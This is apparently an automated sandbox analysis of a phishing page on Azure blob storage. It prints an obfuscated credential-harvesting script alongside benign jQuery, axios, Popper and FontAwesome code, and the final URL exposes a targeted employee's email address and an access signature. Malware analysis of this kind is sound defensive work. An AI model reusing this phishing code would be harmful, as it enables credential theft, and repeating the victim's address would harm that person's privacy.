| URL: https://copilotse.blob.core.windows.net Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://copilotse.blob.core.windows.net |
| URL: https://copilotse.blob.core.windows.net/$web/hgyxx... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High risk due to multiple suspicious indicators: heavy obfuscation (encoded variable names and strings), URL manipulation and base64 handling, DOM manipulation, and potential data exfiltration (collecting email and browser data). The code appears to be part of a credential harvesting or phishing operation."
} |
(function(_0x28e6a0,_0x1fea61){var _0x5a2bf9=_0xff0d,_0x4f8b72=_0x28e6a0();while(!![]){try{var _0x57b9e6=-parseInt(_0x5a2bf9(0x132))/0x1+parseInt(_0x5a2bf9(0xfb))/0x2+parseInt(_0x5a2bf9(0x154))/0x3*(parseInt(_0x5a2bf9(0x164))/0x4)+-parseInt(_0x5a2bf9(0x11a))/0x5+-parseInt(_0x5a2bf9(0x14d))/0x6*(-parseInt(_0x5a2bf9(0x16b))/0x7)+-parseInt(_0x5a2bf9(0x145))/0x8*(parseInt(_0x5a2bf9(0x166))/0x9)+-parseInt(_0x5a2bf9(0x15d))/0xa*(-parseInt(_0x5a2bf9(0x13e))/0xb);if(_0x57b9e6===_0x1fea61)break;else _0x4f8b72['push'](_0x4f8b72['shift']());}catch(_0x1b12d0){_0x4f8b72['push'](_0x4f8b72['shift']());}}}(_0x15ca,0x49be4),$(document)['ready'](function(){var _0xd175a8=_0xff0d,_0x34f441=0x0;initializePage(),$(_0xd175a8(0x158))[_0xd175a8(0x148)](function(){var _0x22db1d=_0xd175a8;$(_0x22db1d(0x128))[_0x22db1d(0x167)](),$(_0x22db1d(0x115))[_0x22db1d(0xf7)](''),$(_0x22db1d(0x15a))[_0x22db1d(0x13f)]({'left':0xc8,'opacity':'hide'},0x0),$(_0x22db1d(0xfc))[_0x22db1d(0x13f)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x3f5472=handleBase64Data(window[_0xd175a8(0x118)][_0xd175a8(0x10f)][_0xd175a8(0x11c)](0x1));if(!_0x3f5472){}else{var _0x8991f7=_0x3f5472;$(_0xd175a8(0x115))[_0xd175a8(0xf7)](_0x8991f7);var _0x1f380c=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x1f380c[_0xd175a8(0x110)](_0x8991f7))return $(_0xd175a8(0x10a))[_0xd175a8(0x105)](),_0x3f5472['focus'],![];var _0x49b40a=_0x8991f7[_0xd175a8(0x152)]('@'),_0x6f2ab8=_0x8991f7[_0xd175a8(0x11c)](_0x49b40a+0x1),_0x2be173=_0x6f2ab8['substr'](0x0,_0x6f2ab8[_0xd175a8(0x152)]('.')),_0x4e1a5c=_0x2be173['toLowerCase'](),_0x33915f=_0x2be173['toUpperCase'](),_0x5bb4aa=GetBrowserandLanguage()[0x0];}var _0x2f9cf3=_0xd175a8(0x101);$('#sub_btn')[_0xd175a8(0x148)](function(_0x36f2e1){var _0xb5dc64=_0xd175a8;$('#errror')[_0xb5dc64(0x167)](),$('#mgss')['hide'](),_0x36f2e1[_0xb5dc64(0x159)]();var _0x108fdc=$('#ai')[_0xb5dc64(0xf7)](),_0x36bfac=$(_0xb5dc64(0x16a))['val'](),_0x3acd23=$(_0xb5dc64(0x119))[_0xb5dc64(0x144)]();$('#mgss')['text'](_0x3acd23);var _0x40cd4c=_0x108fdc,_0x48c0ec=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x48c0ec['test'](_0x40cd4c))return $(_0xb5dc64(0x10a))[_0xb5dc64(0x105)](),_0x108fdc[_0xb5dc64(0x12e)],![];var _0x1afb6a=_0x40cd4c[_0xb5dc64(0x152)]('@'),_0x2ea0b5=_0x40cd4c[_0xb5dc64(0x11c)](_0x1afb6a+0x1),_0xb95c3d=_0x2ea0b5[_0xb5dc64(0x11c)](0x0,_0x2ea0b5[_0xb5dc64(0x152)]('.')),_0x34e9c9=_0xb95c3d[_0xb5dc64(0x147)](),_0x2e6b8d=_0xb95c3d[_0xb5dc64(0x112)]();$(_0xb5dc64(0x149))[_0xb5dc64(0x144)](_0x2e6b8d),$(_0xb5dc64(0x11d))[_0xb5dc64(0x144)](_0x2ea0b5),_0x34f441=_0x34f441+0x1;});}));function GetBrowserandLanguage(){var _0x5a027b=_0xff0d;let _0xcc884=window[_0x5a027b(0x12a)][_0x5a027b(0x15f)],_0x15cb16=window[_0x5a027b(0x12a)][_0x5a027b(0x10c)],_0x560500=[_0xcc884,_0x15cb16];return _0x560500;}function initializePage(){var _0x1dd5ec=_0xff0d;setTimeout(function(){var _0x1a18dc=_0xff0d;document['getElementsByClassName'](_0x1a18dc(0x14b))[0x0][_0x1a18dc(0xfe)][_0x1a18dc(0x14c)]=_0x1a18dc(0x125);var _0x1760d=location[_0x1a18dc(0x104)];const _0x12df43=new URL(_0x1760d);let _0x1ea243=_0x12df43[_0x1a18dc(0x10f)];_0x1ea243=handleBase64Data(_0x1ea243[_0x1a18dc(0x11c)](0x1)[_0x1a18dc(0x127)]('/')[0x0]);let _0x309b8b=_0x1ea243['substring'](_0x1ea243[_0x1a18dc(0x152)]('@')+0x1);var _0x18716b=_0x1a18dc(0x10d)+_0x309b8b;document[_0x1a18dc(0x137)][_0x1a18dc(0xfe)]['backgroundImage']=_0x1a18dc(0x113)+_0x18716b+'\x27)',document[_0x1a18dc(0x156)](_0x1a18dc(0x123))[0x0][_0x1a18dc(0xfe)]['display']='block',document[_0x1a18dc(0x156)](_0x1a18dc(0x103))[0x0][_0x1a18dc(0xfe)][_0x1a18dc(0x14c)]=_0x1a18dc(0x13b);},0x2bc);const _0x1811b2=window[_0x1dd5ec(0x118)][_0x1dd5ec(0x10f)]['substr'](0x1)[_0x1dd5ec(0x127)]('/');var _0x4a3add=handleBase64Data(_0x1811b2[0x0]);const _0x388e76=getLouserzedLanguage(_0x1811b2[0x1]);$('#error')['html'](_0x388e76[_0x1dd5ec(0x13a)]),$(_0x1dd5ec(0x160))[_0x1dd5ec(0x144)](_0x388e76[_0x1dd5ec(0x141)]),$(_0x1dd5ec(0x128))['html'](_0x38 |
| URL: https://code.jquery.com/jquery-3.1.1.min.js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is a legitimate jQuery library snippet (version 3.1.1). It's a standard, widely-used JavaScript library with no malicious indicators. The code is from a trusted source (jquery.org) and contains typical jQuery initialization and utility functions. While it uses some advanced JavaScript patterns, they are all legitimate and well-documented."
} |
/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */
!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(f.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(a<0?b:0);return this.pushStack(c>=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||r.isFunction(g)||(g={}),h===i&&(g=this,h--);h<i;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(r.isPlainObject(d)||(e=r.isArray(d)))?(e?(e=!1,f=c&&r.isArray(c)?c:[]):f=c&&r.isPlainObject(c)?c:{},g[b]=r.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},r.extend({expando:"jQuery"+(q+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===r.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=r.type(a);return("number"===b||"string"===b)&&!isNaN(a-parseFloat(a))},isPlainObject:function(a){var b,c;return!(!a||"[object Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?j[k.call(a)]||"object":typeof a},globalEval:function(a){p(a)},camelCase:function(a){return a.replace(t,"ms-").replace(u,v)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(s,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(w(Object(a))?r.merge(c,"string"==typeof a?[a]:a):h.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:i.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;d<c;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;f<g;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,f=0,h=[];if(w(a))for(d=a.length;f<d;f++)e=b(a[f],f,c),null!=e&&h.push(e);else for(f in a)e=b(a[f],f,c),null!=e&&h.push(e);return g.apply([],h)},guid:1,proxy:function(a,b){var c,d,e;if("string"==typeof b&&(c=a[b],b=a,a=c),r.isFunction(a))return d=f.call(arguments,2),e=function(){return a.apply(b||this,d.concat(f.call(arguments)))},e.guid=a.guid=a.guid||r.guid++,e},now:Date.now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[obje |
| URL: https://cdnjs.cloudflare.com/ajax/libs/axios/0.20.... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is the legitimate Axios HTTP client library source code. It's a widely-used, open-source library for making HTTP requests. The code shows standard module export patterns, type checking utilities, and HTTP request handling. No suspicious behaviors or malicious patterns are present."
} |
/* axios v0.20.0 | (c) 2020 by Matt Zabriskie */
!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.axios=t():e.axios=t()}(this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return e[r].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n={};return t.m=e,t.c=n,t.p="",t(0)}([function(e,t,n){e.exports=n(1)},function(e,t,n){"use strict";function r(e){var t=new s(e),n=i(s.prototype.request,t);return o.extend(n,s.prototype,t),o.extend(n,t),n}var o=n(2),i=n(3),s=n(4),a=n(22),u=n(10),c=r(u);c.Axios=s,c.create=function(e){return r(a(c.defaults,e))},c.Cancel=n(23),c.CancelToken=n(24),c.isCancel=n(9),c.all=function(e){return Promise.all(e)},c.spread=n(25),e.exports=c,e.exports.default=c},function(e,t,n){"use strict";function r(e){return"[object Array]"===R.call(e)}function o(e){return"undefined"==typeof e}function i(e){return null!==e&&!o(e)&&null!==e.constructor&&!o(e.constructor)&&"function"==typeof e.constructor.isBuffer&&e.constructor.isBuffer(e)}function s(e){return"[object ArrayBuffer]"===R.call(e)}function a(e){return"undefined"!=typeof FormData&&e instanceof FormData}function u(e){var t;return t="undefined"!=typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(e):e&&e.buffer&&e.buffer instanceof ArrayBuffer}function c(e){return"string"==typeof e}function f(e){return"number"==typeof e}function p(e){return null!==e&&"object"==typeof e}function d(e){if("[object Object]"!==R.call(e))return!1;var t=Object.getPrototypeOf(e);return null===t||t===Object.prototype}function l(e){return"[object Date]"===R.call(e)}function h(e){return"[object File]"===R.call(e)}function m(e){return"[object Blob]"===R.call(e)}function y(e){return"[object Function]"===R.call(e)}function g(e){return p(e)&&y(e.pipe)}function v(e){return"undefined"!=typeof URLSearchParams&&e instanceof URLSearchParams}function x(e){return e.replace(/^\s*/,"").replace(/\s*$/,"")}function w(){return("undefined"==typeof navigator||"ReactNative"!==navigator.product&&"NativeScript"!==navigator.product&&"NS"!==navigator.product)&&("undefined"!=typeof window&&"undefined"!=typeof document)}function b(e,t){if(null!==e&&"undefined"!=typeof e)if("object"!=typeof e&&(e=[e]),r(e))for(var n=0,o=e.length;n<o;n++)t.call(null,e[n],n,e);else for(var i in e)Object.prototype.hasOwnProperty.call(e,i)&&t.call(null,e[i],i,e)}function E(){function e(e,n){d(t[n])&&d(e)?t[n]=E(t[n],e):d(e)?t[n]=E({},e):r(e)?t[n]=e.slice():t[n]=e}for(var t={},n=0,o=arguments.length;n<o;n++)b(arguments[n],e);return t}function C(e,t,n){return b(t,function(t,r){n&&"function"==typeof t?e[r]=S(t,n):e[r]=t}),e}function j(e){return 65279===e.charCodeAt(0)&&(e=e.slice(1)),e}var S=n(3),R=Object.prototype.toString;e.exports={isArray:r,isArrayBuffer:s,isBuffer:i,isFormData:a,isArrayBufferView:u,isString:c,isNumber:f,isObject:p,isPlainObject:d,isUndefined:o,isDate:l,isFile:h,isBlob:m,isFunction:y,isStream:g,isURLSearchParams:v,isStandardBrowserEnv:w,forEach:b,merge:E,extend:C,trim:x,stripBOM:j}},function(e,t){"use strict";e.exports=function(e,t){return function(){for(var n=new Array(arguments.length),r=0;r<n.length;r++)n[r]=arguments[r];return e.apply(t,n)}}},function(e,t,n){"use strict";function r(e){this.defaults=e,this.interceptors={request:new s,response:new s}}var o=n(2),i=n(5),s=n(6),a=n(7),u=n(22);r.prototype.request=function(e){"string"==typeof e?(e=arguments[1]||{},e.url=arguments[0]):e=e||{},e=u(this.defaults,e),e.method?e.method=e.method.toLowerCase():this.defaults.method?e.method=this.defaults.method.toLowerCase():e.method="get";var t=[a,void 0],n=Promise.resolve(e);for(this.interceptors.request.forEach(function(e){t.unshift(e.fulfilled,e.rejected)}),this.interceptors.response.forEach(function(e){t.push(e.fulfilled,e.rejected)});t.length;)n=n.then(t.shift(),t.shift());return n},r.prototype.getUri=function(e){return e=u(this.defaults,e),i |
| URL: https://code.jquery.com/jquery-3.2.1.slim.min.js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is a legitimate jQuery library (version 3.2.1) with some modules excluded. It's a well-known, trusted library used by millions of websites. The code shows standard jQuery initialization patterns and core functionality implementation. No suspicious behaviors or malicious indicators are present."
} |
/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */
!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(f.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(a<0?b:0);return this.pushStack(c>=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||r.isFunction(g)||(g={}),h===i&&(g=this,h--);h<i;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(r.isPlainObject(d)||(e=Array.isArray(d)))?(e?(e=!1,f=c&&Array.isArray(c)?c:[]):f=c&&r.isPlainObject(c)?c:{},g[b]=r.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},r.extend({expando:"jQuery"+(q+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===r.type(a)},isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=r.type(a);return("number"===b||"string"===b)&&!isNaN(a-parseFloat(a))},isPlainObject:function(a){var b,c;return!(!a||"[object Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?j[k.call(a)]||"object":typeof a},globalEval:function(a){p(a)},camelCase:function(a){return a.replace(t,"ms-").replace(u,v)},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(s,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(w(Object(a))?r.merge(c,"string"==typeof a?[a]:a):h.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:i.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;d<c;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;f<g;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,f=0,h=[];if(w(a))for(d=a.length;f<d;f++)e=b(a[f],f,c),null!=e&&h.push(e);else for(f in a)e=b(a[f],f,c),null!=e&&h.push(e);return g.apply([],h)},guid:1,proxy:function(a,b){var c,d,e;if("string"==typeof b&&(c=a[b],b=a,a=c),r.isFunction(a))return d |
| URL: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be the Popper.js positioning library, a legitimate and widely-used open-source package. It performs DOM manipulation for positioning elements but only uses standard browser APIs and contains no malicious patterns. The code is from a trusted source (MIT licensed) and performs expected positioning calculations."
} |
/*
Copyright (C) Federico Zivolo 2017
Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).
*/(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}function p(e){var t=e.nodeName;return'BODY'!==t&&('HTML'===t||r(e.firstElementChild)===e)}function s(e){return null===e.parentNode?e:s(e.parentNode)}function d(e,t){if(!e||!e.nodeType||!t||!t.nodeType)return document.documentElement;var o=e.compareDocumentPosition(t)&Node.DOCUMENT_POSITION_FOLLOWING,i=o?e:t,n=o?t:e,a=document.createRange();a.setStart(i,0),a.setEnd(n,0);var l=a.commonAncestorContainer;if(e!==l&&t!==l||i.contains(n))return p(l)?l:r(l);var f=s(e);return f.host?d(f.host,t):d(e,s(t).host)}function a(e){var t=1<arguments.length&&void 0!==arguments[1]?arguments[1]:'top',o='top'===t?'scrollTop':'scrollLeft',i=e.nodeName;if('BODY'===i||'HTML'===i){var n=e.ownerDocument.documentElement,r=e.ownerDocument.scrollingElement||n;return r[o]}return e[o]}function l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['border'+o+'Width'],10)+parseFloat(e['border'+i+'Width'],10)}function m(e,t,o,i){return J(t['offset'+e],t['scroll'+e],o['client'+e],o['offset'+e],o['scroll'+e],ie()?o['offset'+e]+i['margin'+('Height'===e?'Top':'Left')]+i['margin'+('Height'===e?'Bottom':'Right')]:0)}function h(){var e=document.body,t=document.documentElement,o=ie()&&getComputedStyle(t);return{height:m('Height',e,t,o),width:m('Width',e,t,o)}}function c(e){return se({},e,{right:e.left+e.width,bottom:e.top+e.height})}function g(e){var o={};if(ie())try{o=e.getBoundingClientRect();var i=a(e,'top'),n=a(e,'left');o.top+=i,o.left+=n,o.bottom+=i,o.right+=n}catch(e){}else o=e.getBoundingClientRect();var r={left:o.left,top:o.top,width:o.right-o.left,height:o.bottom-o.top},p='HTML'===e.nodeName?h():{},s=p.width||e.clientWidth||r.right-r.left,d=p.height||e.clientHeight||r.bottom-r.top,l=e.offsetWidth-s,m=e.offsetHeight-d;if(l||m){var g=t(e);l-=f(g,'x'),m-=f(g,'y'),r.width-=l,r.height-=m}return c(r)}function u(e,o){var i=ie(),r='HTML'===o.nodeName,p=g(e),s=g(o),d=n(e),a=t(o),f=parseFloat(a.borderTopWidth,10),m=parseFloat(a.borderLeftWidth,10),h=c({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return(i?o.contains(d):o===d&&'BODY'!==d.nodeName)&&(h=l(h,o)),h}function b(e){var t=e.ownerDocument.documentElement,o=u(e,t),i=J(t.clientWidth,window.innerWidth||0),n=J(t.clientHeight,window.innerHeight||0),r=a(t),p=a(t,'left'),s={top:r-o.top+o.marginTop,left:p-o.left+o.marginLeft,width:i,height:n};return c(s)}function w(e){var i=e.nodeName;return'BODY'===i||'HTML'===i?!1:'fixed'===t(e,'position')||w(o(e))}function y(e,t,i,r){var p={top:0,left:0},s=d(e,t);if('viewport'===r)p=b(s);else{var a;'scrollParent'===r?(a=n(o(t)),'BODY'===a.nodeName&&(a=e.ownerDocument.documentElement)):'window'===r?a=e.ownerDocume |
| URL: https://kit.fontawesome.com/585b051251.js... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This is a legitimate FontAwesome configuration and loader script. It's from a trusted domain (fontawesome.com), uses standard JavaScript practices, and performs expected functionality for a font/icon loading service. The code is minified but not maliciously obfuscated. The only minor risk factors are the dynamic loading features and DOM manipulation required for font loading."
} |
window.FontAwesomeKitConfig = {"id":132695554,"version":"5.15.4","token":"585b051251","method":"css","baseUrl":"https://ka-f.fontawesome.com","license":"free","asyncLoading":{"enabled":true},"autoA11y":{"enabled":true},"baseUrlKit":"https://kit.fontawesome.com","detectConflictsUntil":null,"iconUploads":{},"minify":{"enabled":true},"v4FontFaceShim":{"enabled":false},"v4shim":{"enabled":true},"v5FontFaceShim":{"enabled":false}};
!function(t){"function"==typeof define&&define.amd?define("kit-loader",t):t()}((function(){"use strict";function t(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);e&&(r=r.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,r)}return n}function e(e){for(var n=1;n<arguments.length;n++){var o=null!=arguments[n]?arguments[n]:{};n%2?t(Object(o),!0).forEach((function(t){r(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):t(Object(o)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(o,t))}))}return e}function n(t){return(n="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}function r(t,e,n){return(e=function(t){var e=function(t,e){if("object"!=typeof t||null===t)return t;var n=t[Symbol.toPrimitive];if(void 0!==n){var r=n.call(t,e||"default");if("object"!=typeof r)return r;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===e?String:Number)(t)}(t,"string");return"symbol"==typeof e?e:String(e)}(e))in t?Object.defineProperty(t,e,{value:n,enumerable:!0,configurable:!0,writable:!0}):t[e]=n,t}function o(t,e){return function(t){if(Array.isArray(t))return t}(t)||function(t,e){var n=null==t?null:"undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(null!=n){var r,o,i,a,c=[],u=!0,s=!1;try{if(i=(n=n.call(t)).next,0===e){if(Object(n)!==n)return;u=!1}else for(;!(u=(r=i.call(n)).done)&&(c.push(r.value),c.length!==e);u=!0);}catch(t){s=!0,o=t}finally{try{if(!u&&null!=n.return&&(a=n.return(),Object(a)!==a))return}finally{if(s)throw o}}return c}}(t,e)||i(t,e)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function i(t,e){if(t){if("string"==typeof t)return a(t,e);var n=Object.prototype.toString.call(t).slice(8,-1);return"Object"===n&&t.constructor&&(n=t.constructor.name),"Map"===n||"Set"===n?Array.from(t):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?a(t,e):void 0}}function a(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}var c,u,s,f,l,d="Classic",h=(r(c={},"classic","Classic"),r(c,"duotone","Duotone"),r(c,"sharp","Sharp"),r(c,"sharp-duotone","Sharp Duotone"),["fak","fa-kit","fakd","fa-kit-duotone"]),p=(r(u={},"kit","Kit"),r(u,"kit-duotone","Kit Duotone"),"duotone-group"),m="swap-opacity",b="primary",y="secondary",v=(r(s={},"classic","Classic"),r(s,"duotone","Duotone"),r(s,"sharp","Sharp"),r(s,"sharp-duotone","Sharp Duotone"),r(f={},"kit","Kit"),r(f,"kit-duotone","Kit Duotone"),["fa","fas","far","fal","fat","fad","fadr","fadl","fadt","fab","fass","fasr","fasl","fast","fasds","fasdr","fasdl","fasdt"].concat(["fa-classic","fa-duotone","fa-sharp","fa-sharp-duotone"],["fa-solid","fa-regular","fa-light","fa-thin","fa-duotone","fa-brands"])),g=[1,2,3,4,5,6,7,8,9,10],w=g.concat([11,12,13,14,15,16,17,18,19,20]);[].concat((l=Object.keys({classic:["fas","far","fal","fat","fad"],duotone:["fadr","fadl","fadt"],sharp:["fass","fasr","fasl","fast"],"sharp-duotone":["fasds","fasdr","fasdl","fasdt"]}),function(t){if(Array.isArray(t))return a(t)}(l)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(l)||i(l)||function() |
| URL: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Philllyshipyard Email Login",
"prominent_button_name": "Login",
